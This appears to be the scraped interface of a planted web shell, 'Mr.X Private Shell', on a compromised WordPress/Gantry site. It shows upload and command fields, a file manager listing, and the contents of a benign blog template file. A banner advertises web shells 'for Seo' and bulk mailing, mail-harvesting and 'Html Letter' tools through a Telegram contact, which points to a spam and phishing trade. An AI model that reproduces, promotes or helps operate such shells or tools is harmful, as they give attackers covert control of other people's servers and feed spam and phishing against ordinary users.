__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
{% extends "partials/page.html.twig" %}
{% set twigTemplate = 'index.html.twig' %}
{% set scope = 'blog' %}

{% block content %}

    <div class="platform-content">
        <div class="blog">

            {# Begin Page Header #}
            {% if gantry.config.get('content.' ~ scope ~ '.heading.enabled', '0') and gantry.config.get('content.' ~ scope ~ '.heading.text') is not empty %}
                <header class="page-header">
                    <h1>
                        {{ gantry.config.get('content.' ~ scope ~ '.heading.text') }}
                    </h1>
                </header>
            {% endif %}
            {# End Page Header #}

            {# Begin Post Entries #}
            <section class="entries">
                <div class="g-grid">
                    {% for post in posts %}
                        <div class="g-block {% if pagination.current == 1 and 'sticky' in post.class %}size-100{% else %}{{ gantry.config.get('content.' ~ scope ~ '.content.columns')|default('size-100') }}{% endif %}">
                            {% include ['partials/content-' ~ scope ~ '.html.twig', (post.format) ? 'partials/content-' ~ post.format ~ '.html.twig' : '', 'partials/content.html.twig'] %}
                        </div>
                    {% endfor %}
                </div>
            </section>
            {# End Post Entries #}

            {# Begin Pagination #}
            {% if pagination.pages and pagination.pages|length > 1 %}
                {% include 'partials/pagination.html.twig' %}
            {% endif %}
            {# End Pagination #}

        </div>
    </div>

{% endblock %}

Filemanager

Name Type Size Permission Actions
partials Folder 0775
404.html.twig File 199 B 0775
archive.html.twig File 2.15 KB 0775
bbpress.html.twig File 391 B 0775
buddypress.html.twig File 400 B 0775
index.html.twig File 1.59 KB 0775
offline.html.twig File 179 B 0775
page-plugin.html.twig File 281 B 0775
page.html.twig File 436 B 0775
searchform.html.twig File 600 B 0775
single.html.twig File 440 B 0775
Filemanager